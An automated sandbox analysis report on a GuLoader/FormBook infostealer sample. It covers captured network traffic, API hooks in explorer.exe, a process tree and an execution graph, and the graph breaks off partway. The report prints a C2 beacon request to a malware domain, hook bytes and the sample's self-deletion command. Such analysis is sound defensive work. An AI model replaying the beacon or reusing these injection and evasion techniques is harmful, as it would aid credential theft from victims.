                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      9192.168.11.3050141172.67.193.17780C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 16, 2023 11:33:40.532597065 CEST334OUTGET /rs10/?wr5xXxu=OJwcZLoBL0+y/b1nUKgyY9euQNPYkahm34mOnyUSFfzLd1inlK2E8ylg3tCjMnF+BDY5&CZF=FZ4P3Z3Pkfe HTTP/1.1
                                                                                      Host: www.hdlive7.live
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Oct 16, 2023 11:33:40.708460093 CEST334INHTTP/1.1 301 Moved Permanently
                                                                                      Date: Mon, 16 Oct 2023 09:33:40 GMT
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=3600
                                                                                      Expires: Mon, 16 Oct 2023 10:33:40 GMT
                                                                                      Location: https://www.hdlive7.live/rs10/?wr5xXxu=OJwcZLoBL0+y/b1nUKgyY9euQNPYkahm34mOnyUSFfzLd1inlK2E8ylg3tCjMnF+BDY5&CZF=FZ4P3Z3Pkfe
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FjQuvMpeHdNr7qHSxlUg0K9zKU0jhkYPlfxqqBdtkWhQnxiESCsONPRx5qTPHCaFqvxeC07TIUKen9GHSEykaMg3LRgTfzr5%2Ful91tFbLAD%2BAZKJnMwQV8eeuX8zC1KefkDr"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 816f4d38dab42b98-LAX
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Code Manipulations

                                                                                      User Modules

                                                                                      Hook Summary

                                                                                      Function NameHook TypeActive in Processes
                                                                                      PeekMessageAINLINEexplorer.exe
                                                                                      PeekMessageWINLINEexplorer.exe
                                                                                      GetMessageWINLINEexplorer.exe
                                                                                      GetMessageAINLINEexplorer.exe

                                                                                      Processes

                                                                                      Process: explorer.exe, Module: user32.dll
                                                                                      Function NameHook TypeNew Data
                                                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE5
                                                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE5
                                                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE5
                                                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE5

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:11:26:38
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:1'272'864 bytes
                                                                                      MD5 hash:6E8215EEE3034D6DCF18D79D397E5715
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2064063985138.0000000009FD3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:11:27:28
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:1'272'864 bytes
                                                                                      MD5 hash:6E8215EEE3034D6DCF18D79D397E5715
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:11:27:48
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                      Imagebase:0x7ff6e35c0000
                                                                                      File size:4'849'904 bytes
                                                                                      MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:14
                                                                                      Start time:11:28:37
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Windows\SysWOW64\autofmt.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                                      Imagebase:0xed0000
                                                                                      File size:831'488 bytes
                                                                                      MD5 hash:ABC9F7DAB410FE452D2D90C9960077BE
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:15
                                                                                      Start time:11:28:37
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                      Imagebase:0xd60000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:16
                                                                                      Start time:11:28:40
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:/c del "C:\Users\user\Desktop\jU0hAXFL0k.exe"
                                                                                      Imagebase:0xd60000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:17
                                                                                      Start time:11:28:41
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6989f0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:20.7%
                                                                                        Dynamic/Decrypted Code Coverage:14%
                                                                                        Signature Coverage:19.4%
                                                                                        Total number of Nodes:1534
                                                                                        Total number of Limit Nodes:48
                                                                                        execution_graph 5175 401d41 5176 401d54 GetDlgItem 5175->5176 5177 401d47 5175->5177 5179 401d4e 5176->5179 5178 402b0a 17 API calls 5177->5178 5178->5179 5180 401d8f GetClientRect LoadImageA SendMessageA 5179->5180 5181 402b2c 17 API calls 5179->5181 5183 401deb 5180->5183 5185 4029b8 5180->5185 5181->5180 5184 401df3 DeleteObject 5183->5184 5183->5185 5184->5185 4103 401746 4104 402b2c 17 API calls 4103->4104 4105 40174d 4104->4105 4109 405ba2 4105->4109 4107 401754 4108 405ba2 2 API calls 4107->4108 4108->4107 4110 405bad GetTickCount GetTempFileNameA 4109->4110 4111 405bde 4110->4111 4112 405bda 4110->4112 4111->4107 4112->4110 4112->4111 5186 401947 5187 402b2c 17 API calls 5186->5187 5188 40194e lstrlenA 5187->5188 5189 4025e4 5188->5189 5190 401fc8 5191 402b2c 17 API calls 5190->5191 5192 401fcf 5191->5192 5193 406372 5 API calls 5192->5193 5194 401fde 5193->5194 5195 401ff6 GlobalAlloc 5194->5195 5196 40205e 5194->5196 5195->5196 5197 40200a 5195->5197 5198 406372 5 API calls 5197->5198 5199 402011 5198->5199 5200 406372 5 API calls 5199->5200 5201 40201b 5200->5201 5201->5196 5205 405f38 wsprintfA 5201->5205 5203 402052 5206 405f38 wsprintfA 5203->5206 5205->5203 5206->5196 5207 4025c8 5208 402b2c 17 API calls 5207->5208 5209 4025cf 5208->5209 5212 405b73 GetFileAttributesA CreateFileA 5209->5212 5211 4025db 5212->5211 5213 6fe910e0 5217 6fe9110e 5213->5217 5214 6fe911c4 GlobalFree 5215 6fe912ad 2 API calls 5215->5217 5216 6fe911c3 5216->5214 5217->5214 5217->5215 5217->5216 5218 6fe91266 2 API calls 5217->5218 5219 6fe91155 GlobalAlloc 5217->5219 5220 6fe911ea GlobalFree 5217->5220 5221 6fe912d1 lstrcpyA 5217->5221 5222 6fe911b1 GlobalFree 5217->5222 5218->5222 5219->5217 5220->5217 5221->5217 5222->5217 4389 4014ca 4390 405101 24 API calls 4389->4390 4391 4014d1 4390->4391 5230 6fe92be3 5231 6fe92bfb 5230->5231 5232 6fe91534 2 API calls 5231->5232 5233 6fe92c16 5232->5233 5234 40484b 5235 404877 5234->5235 5236 40485b 5234->5236 5237 4048aa 5235->5237 5238 40487d SHGetPathFromIDListA 5235->5238 5245 4056da GetDlgItemTextA 5236->5245 5240 404894 SendMessageA 5238->5240 5241 40488d 5238->5241 5240->5237 5243 40140b 2 API calls 5241->5243 5242 404868 SendMessageA 5242->5235 5243->5240 5245->5242 4392 40254c 4393 402b6c 17 API calls 4392->4393 4394 402556 4393->4394 4395 402b0a 17 API calls 4394->4395 4396 40255f 4395->4396 4397 402783 4396->4397 4398 402586 RegEnumValueA 4396->4398 4399 40257a RegEnumKeyA 4396->4399 4400 4025a2 RegCloseKey 4398->4400 4401 40259b 4398->4401 4399->4400 4400->4397 4401->4400 4577 4041d3 4578 4041e9 4577->4578 4583 4042f5 4577->4583 4612 404068 4578->4612 4579 404364 4582 40436e GetDlgItem 4579->4582 4585 40442e 4579->4585 4586 404384 4582->4586 4587 4043ec 4582->4587 4583->4579 4583->4585 4588 404339 GetDlgItem SendMessageA 4583->4588 4584 40423f 4589 404068 18 API calls 4584->4589 4621 4040cf 4585->4621 4586->4587 4595 4043aa SendMessageA LoadCursorA SetCursor 4586->4595 4587->4585 4591 4043fe 4587->4591 4617 40408a KiUserCallbackDispatcher 4588->4617 4593 40424c CheckDlgButton 4589->4593 4596 404404 SendMessageA 4591->4596 4597 404415 4591->4597 4615 40408a KiUserCallbackDispatcher 4593->4615 4594 404429 4609 404477 4595->4609 4596->4597 4597->4594 4601 40441b SendMessageA 4597->4601 4598 40435f 4618 404453 4598->4618 4601->4594 4603 40426a GetDlgItem 4616 40409d SendMessageA 4603->4616 4606 404280 SendMessageA 4607 4042a7 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4606->4607 4608 40429e GetSysColor 4606->4608 4607->4594 4608->4607 4635 4056bc ShellExecuteExA 4609->4635 4611 4043dd LoadCursorA SetCursor 4611->4587 4613 405ffc 17 API calls 4612->4613 4614 404073 SetDlgItemTextA 4613->4614 4614->4584 4615->4603 4616->4606 4617->4598 4619 404461 4618->4619 4620 404466 SendMessageA 4618->4620 4619->4620 4620->4579 4622 404192 4621->4622 4623 4040e7 GetWindowLongA 4621->4623 4622->4594 4623->4622 4624 4040fc 4623->4624 4624->4622 4625 404129 GetSysColor 4624->4625 4626 40412c 4624->4626 4625->4626 4627 404132 SetTextColor 4626->4627 4628 40413c SetBkMode 4626->4628 4627->4628 4629 404154 GetSysColor 4628->4629 4630 40415a 4628->4630 4629->4630 4631 404161 SetBkColor 4630->4631 4632 40416b 4630->4632 4631->4632 4632->4622 4633 404185 CreateBrushIndirect 4632->4633 4634 40417e DeleteObject 4632->4634 4633->4622 4634->4633 4635->4611 5246 4027d3 5268 405b73 GetFileAttributesA CreateFileA 5246->5268 5248 4027da 5249 4027e6 GlobalAlloc 5248->5249 5250 40287d 5248->5250 5251 402874 CloseHandle 5249->5251 5252 4027ff 5249->5252 5253 402885 DeleteFileA 5250->5253 5254 402898 5250->5254 5251->5250 5269 4031ed SetFilePointer 5252->5269 5253->5254 5256 402805 5257 4031d7 ReadFile 5256->5257 5258 40280e GlobalAlloc 5257->5258 5259 402852 5258->5259 5260 40281e 5258->5260 5262 405c1a WriteFile 5259->5262 5261 402ffb 35 API calls 5260->5261 5267 40282b 5261->5267 5263 40285e GlobalFree 5262->5263 5264 402ffb 35 API calls 5263->5264 5265 402871 5264->5265 5265->5251 5266 402849 GlobalFree 5266->5259 5267->5266 5268->5248 5269->5256 5270 4014d6 5271 402b0a 17 API calls 5270->5271 5272 4014dc Sleep 5271->5272 5274 4029b8 5272->5274 5016 401759 5017 402b2c 17 API calls 5016->5017 5018 401760 5017->5018 5019 401786 5018->5019 5020 40177e 5018->5020 5057 405fda lstrcpynA 5019->5057 5056 405fda lstrcpynA 5020->5056 5023 401784 5027 406244 5 API calls 5023->5027 5024 401791 5025 405972 3 API calls 5024->5025 5026 401797 lstrcatA 5025->5026 5026->5023 5040 4017a3 5027->5040 5028 4062dd 2 API calls 5028->5040 5029 4017e4 5030 405b4e 2 API calls 5029->5030 5030->5040 5032 4017ba CompareFileTime 5032->5040 5033 40187e 5034 405101 24 API calls 5033->5034 5035 401888 5034->5035 5037 402ffb 35 API calls 5035->5037 5036 405101 24 API calls 5045 40186a 5036->5045 5038 40189b 5037->5038 5041 4018af SetFileTime 5038->5041 5043 4018c1 CloseHandle 5038->5043 5039 405fda lstrcpynA 5039->5040 5040->5028 5040->5029 5040->5032 5040->5033 5040->5039 5042 405ffc 17 API calls 5040->5042 5050 4056f6 MessageBoxIndirectA 5040->5050 5053 401855 5040->5053 5055 405b73 GetFileAttributesA CreateFileA 5040->5055 5041->5043 5042->5040 5044 4018d2 5043->5044 5043->5045 5046 4018d7 5044->5046 5047 4018ea 5044->5047 5048 405ffc 17 API calls 5046->5048 5049 405ffc 17 API calls 5047->5049 5051 4018df lstrcatA 5048->5051 5052 4018f2 5049->5052 5050->5040 5051->5052 5052->5045 5054 4056f6 MessageBoxIndirectA 5052->5054 5053->5036 5053->5045 5054->5045 5055->5040 5056->5023 5057->5024 5275 401659 5276 402b2c 17 API calls 5275->5276 5277 40165f 5276->5277 5278 4062dd 2 API calls 5277->5278 5279 401665 5278->5279 5280 401959 5281 402b0a 17 API calls 5280->5281 5282 401960 5281->5282 5283 402b0a 17 API calls 5282->5283 5284 40196d 5283->5284 5285 402b2c 17 API calls 5284->5285 5286 401984 lstrlenA 5285->5286 5288 401994 5286->5288 5287 4019d4 5288->5287 5292 405fda lstrcpynA 5288->5292 5290 4019c4 5290->5287 5291 4019c9 lstrlenA 5290->5291 5291->5287 5292->5290 5058 4024da 5059 402b6c 17 API calls 5058->5059 5060 4024e4 5059->5060 5061 402b2c 17 API calls 5060->5061 5062 4024ed 5061->5062 5063 4024f7 RegQueryValueExA 5062->5063 5065 402783 5062->5065 5064 402517 5063->5064 5066 40251d RegCloseKey 5063->5066 5064->5066 5069 405f38 wsprintfA 5064->5069 5066->5065 5069->5066 5300 401cda 5301 402b0a 17 API calls 5300->5301 5302 401ce0 IsWindow 5301->5302 5303 401a0e 5302->5303 5304 402cdd 5305 402d05 5304->5305 5306 402cec SetTimer 5304->5306 5307 402d5a 5305->5307 5308 402d1f MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5305->5308 5306->5305 5308->5307 5309 401a5e 5310 402b0a 17 API calls 5309->5310 5311 401a67 5310->5311 5312 402b0a 17 API calls 5311->5312 5313 401a0e 5312->5313 4045 402363 4046 40236b 4045->4046 4048 402371 4045->4048 4049 402b2c 17 API calls 4046->4049 4047 402381 4051 40238f 4047->4051 4052 402b2c 17 API calls 4047->4052 4048->4047 4050 402b2c 17 API calls 4048->4050 4049->4048 4050->4047 4055 402b2c 4051->4055 4052->4051 4056 402b38 4055->4056 4061 405ffc 4056->4061 4059 402398 WritePrivateProfileStringA 4065 406009 4061->4065 4062 40622b 4063 402b59 4062->4063 4094 405fda lstrcpynA 4062->4094 4063->4059 4078 406244 4063->4078 4065->4062 4066 406205 lstrlenA 4065->4066 4069 405ffc 10 API calls 4065->4069 4070 406121 GetSystemDirectoryA 4065->4070 4072 406134 GetWindowsDirectoryA 4065->4072 4073 406244 5 API calls 4065->4073 4074 406168 SHGetSpecialFolderLocation 4065->4074 4075 405ffc 10 API calls 4065->4075 4076 4061ae lstrcatA 4065->4076 4087 405ec1 4065->4087 4092 405f38 wsprintfA 4065->4092 4093 405fda lstrcpynA 4065->4093 4066->4065 4069->4066 4070->4065 4072->4065 4073->4065 4074->4065 4077 406180 SHGetPathFromIDListA CoTaskMemFree 4074->4077 4075->4065 4076->4065 4077->4065 4084 406250 4078->4084 4079 4062b8 4080 4062bc CharPrevA 4079->4080 4083 4062d7 4079->4083 4080->4079 4081 4062ad CharNextA 4081->4079 4081->4084 4083->4059 4084->4079 4084->4081 4085 40629b CharNextA 4084->4085 4086 4062a8 CharNextA 4084->4086 4099 40599d 4084->4099 4085->4084 4086->4081 4095 405e60 4087->4095 4090 405f24 4090->4065 4091 405ef5 RegQueryValueExA RegCloseKey 4091->4090 4092->4065 4093->4065 4094->4063 4096 405e6f 4095->4096 4097 405e73 4096->4097 4098 405e78 RegOpenKeyExA 4096->4098 4097->4090 4097->4091 4098->4097 4100 4059a3 4099->4100 4101 4059b6 4100->4101 4102 4059a9 CharNextA 4100->4102 4101->4084 4102->4100 5314 401563 5315 402960 5314->5315 5318 405f38 wsprintfA 5315->5318 5317 402965 5318->5317 5319 401b63 5320 401b70 5319->5320 5321 401bb4 5319->5321 5324 40233b 5320->5324 5327 401b87 5320->5327 5322 401bb8 5321->5322 5323 401bdd GlobalAlloc 5321->5323 5333 401bf8 5322->5333 5340 405fda lstrcpynA 5322->5340 5325 405ffc 17 API calls 5323->5325 5326 405ffc 17 API calls 5324->5326 5325->5333 5329 402348 5326->5329 5338 405fda lstrcpynA 5327->5338 5329->5333 5334 4056f6 MessageBoxIndirectA 5329->5334 5331 401bca GlobalFree 5331->5333 5332 401b96 5339 405fda lstrcpynA 5332->5339 5334->5333 5336 401ba5 5341 405fda lstrcpynA 5336->5341 5338->5332 5339->5336 5340->5331 5341->5333 5342 402765 5343 402b2c 17 API calls 5342->5343 5344 40276c FindFirstFileA 5343->5344 5345 40278f 5344->5345 5348 40277f 5344->5348 5350 405f38 wsprintfA 5345->5350 5347 402796 5351 405fda lstrcpynA 5347->5351 5350->5347 5351->5348 5352 406666 5353 4064ea 5352->5353 5354 406e55 5353->5354 5355 406574 GlobalAlloc 5353->5355 5356 40656b GlobalFree 5353->5356 5357 4065e2 GlobalFree 5353->5357 5358 4065eb GlobalAlloc 5353->5358 5355->5353 5355->5354 5356->5355 5357->5358 5358->5353 5358->5354 5359 4063e7 WaitForSingleObject 5360 406401 5359->5360 5361 406413 GetExitCodeProcess 5360->5361 5362 4063ae 2 API calls 5360->5362 5363 406408 WaitForSingleObject 5362->5363 5363->5360 4120 4023e8 4121 40241a 4120->4121 4122 4023ef 4120->4122 4124 402b2c 17 API calls 4121->4124 4132 402b6c 4122->4132 4126 402421 4124->4126 4137 402bea 4126->4137 4127 402400 4129 402b2c 17 API calls 4127->4129 4130 402407 RegDeleteValueA RegCloseKey 4129->4130 4131 40242e 4130->4131 4133 402b2c 17 API calls 4132->4133 4134 402b83 4133->4134 4135 405e60 RegOpenKeyExA 4134->4135 4136 4023f6 4135->4136 4136->4127 4136->4131 4138 402bf6 4137->4138 4139 402bfd 4137->4139 4138->4131 4139->4138 4141 402c2e 4139->4141 4142 405e60 RegOpenKeyExA 4141->4142 4143 402c5c 4142->4143 4144 402cad 4143->4144 4145 402c82 RegEnumKeyA 4143->4145 4146 402c99 RegCloseKey 4143->4146 4147 402cba RegCloseKey 4143->4147 4149 402c2e 6 API calls 4143->4149 4144->4138 4145->4143 4145->4146 4152 406372 GetModuleHandleA 4146->4152 4147->4144 4149->4143 4151 402cca RegDeleteKeyA 4151->4144 4153 406398 GetProcAddress 4152->4153 4154 40638e 4152->4154 4156 402ca9 4153->4156 4158 406304 GetSystemDirectoryA 4154->4158 4156->4144 4156->4151 4157 406394 4157->4153 4157->4156 4159 406326 wsprintfA LoadLibraryExA 4158->4159 4159->4157 4164 40206a 4165 40207c 4164->4165 4167 40212a 4164->4167 4166 402b2c 17 API calls 4165->4166 4169 402083 4166->4169 4168 401423 24 API calls 4167->4168 4174 4022a9 4168->4174 4170 402b2c 17 API calls 4169->4170 4171 40208c 4170->4171 4172 4020a1 LoadLibraryExA 4171->4172 4173 402094 GetModuleHandleA 4171->4173 4172->4167 4175 4020b1 GetProcAddress 4172->4175 4173->4172 4173->4175 4176 4020c0 4175->4176 4177 4020fd 4175->4177 4179 4020c8 4176->4179 4180 4020df 4176->4180 4230 405101 4177->4230 4227 401423 4179->4227 4185 6fe916db 4180->4185 4181 4020d0 4181->4174 4183 40211e FreeLibrary 4181->4183 4183->4174 4186 6fe9170b 4185->4186 4241 6fe91a98 4186->4241 4188 6fe91712 4189 6fe91834 4188->4189 4190 6fe9172a 4188->4190 4191 6fe91723 4188->4191 4189->4181 4275 6fe922f1 4190->4275 4291 6fe922af 4191->4291 4196 6fe9178e 4200 6fe917dc 4196->4200 4201 6fe91794 4196->4201 4197 6fe91770 4304 6fe924d8 4197->4304 4198 6fe91759 4211 6fe9174f 4198->4211 4301 6fe92cc3 4198->4301 4199 6fe91740 4203 6fe91746 4199->4203 4204 6fe91751 4199->4204 4208 6fe924d8 11 API calls 4200->4208 4323 6fe9156b 4201->4323 4203->4211 4285 6fe92a38 4203->4285 4295 6fe926b2 4204->4295 4214 6fe917cd 4208->4214 4209 6fe91776 4315 6fe91559 4209->4315 4211->4196 4211->4197 4219 6fe91823 4214->4219 4329 6fe9249e 4214->4329 4216 6fe91757 4216->4211 4217 6fe924d8 11 API calls 4217->4214 4219->4189 4221 6fe9182d GlobalFree 4219->4221 4221->4189 4224 6fe9180f 4224->4219 4333 6fe914e2 wsprintfA 4224->4333 4225 6fe91808 FreeLibrary 4225->4224 4228 405101 24 API calls 4227->4228 4229 401431 4228->4229 4229->4181 4231 40511c 4230->4231 4240 4051bf 4230->4240 4232 405139 lstrlenA 4231->4232 4235 405ffc 17 API calls 4231->4235 4233 405162 4232->4233 4234 405147 lstrlenA 4232->4234 4237 405175 4233->4237 4238 405168 SetWindowTextA 4233->4238 4236 405159 lstrcatA 4234->4236 4234->4240 4235->4232 4236->4233 4239 40517b SendMessageA SendMessageA SendMessageA 4237->4239 4237->4240 4238->4237 4239->4240 4240->4181 4336 6fe91215 GlobalAlloc 4241->4336 4243 6fe91abf 4337 6fe91215 GlobalAlloc 4243->4337 4245 6fe91d00 GlobalFree GlobalFree GlobalFree 4246 6fe91d1d 4245->4246 4257 6fe91d67 4245->4257 4247 6fe920f1 4246->4247 4255 6fe91d32 4246->4255 4246->4257 4249 6fe92113 GetModuleHandleA 4247->4249 4247->4257 4248 6fe91bbd GlobalAlloc 4267 6fe91aca 4248->4267 4252 6fe92139 4249->4252 4253 6fe92124 LoadLibraryA 4249->4253 4250 6fe91c08 lstrcpyA 4254 6fe91c12 lstrcpyA 4250->4254 4251 6fe91c26 GlobalFree 4251->4267 4344 6fe915c2 GetProcAddress 4252->4344 4253->4252 4253->4257 4254->4267 4255->4257 4340 6fe91224 4255->4340 4257->4188 4258 6fe9218a 4258->4257 4262 6fe92197 lstrlenA 4258->4262 4259 6fe91fb7 4343 